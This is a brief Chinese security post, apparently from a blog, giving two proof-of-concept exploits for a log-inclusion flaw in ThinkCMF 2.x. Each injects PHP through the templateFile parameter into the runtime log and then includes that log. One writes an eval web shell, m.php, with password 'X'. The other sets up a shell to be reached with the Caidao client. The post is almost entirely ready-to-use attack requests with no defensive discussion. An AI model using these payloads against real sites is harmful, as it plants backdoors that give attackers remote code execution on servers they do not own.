ThinkCMF2.x日志包含getshell

Sp4ce 29 次浏览 0

POC

首先访问
http://target.domain/?a=display&templateFile=%3C?php%20file_put_contents(%27m.php%27,%27%3C%3fphp+eval($_POST[%22X%22])%3b%3F%3E%27);die();?%3E

然后请求http://target.domain/?a=display&templateFile=data/runtime/Logs/Portal/YY_MM_DD.log

即可在http://target.domain/根目录生成m.php,密码是X

POC2

访问http://target.domain/?a=display&templateFile=%3C%3F%70%68%70%20%65%76%61%6C%28%24%5F%50%4F%53%54%5BX%5D%29%3B%3F%3E

然后菜刀连接http://target.domain/?a=display&templateFile=data/runtime/Logs/Portal/YY_MM_DD.log,密码同样是X

发表评论 取消回复
表情